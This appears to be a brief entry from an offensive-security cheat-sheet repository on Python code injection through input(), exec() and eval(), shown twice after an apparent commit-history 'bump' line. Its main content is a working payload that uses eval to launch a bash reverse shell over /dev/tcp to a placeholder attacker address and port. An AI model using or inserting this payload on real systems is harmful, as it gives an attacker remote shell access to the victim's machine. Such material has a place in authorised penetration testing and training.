killchain-compendium/exploit/python/code_injection.md

# Code Injection

* Python's `input()`, `exec()` and `eval()` makes it possible

## Usage

* Payload example
```python
eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#")
```
bump 2022-01-31 18:30:47 +01:00			`# Code Injection`

			* Python's `input()`, `exec()` and `eval()` makes it possible

			`## Usage`

			`* Payload example`
			```python
			`eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#")`
			```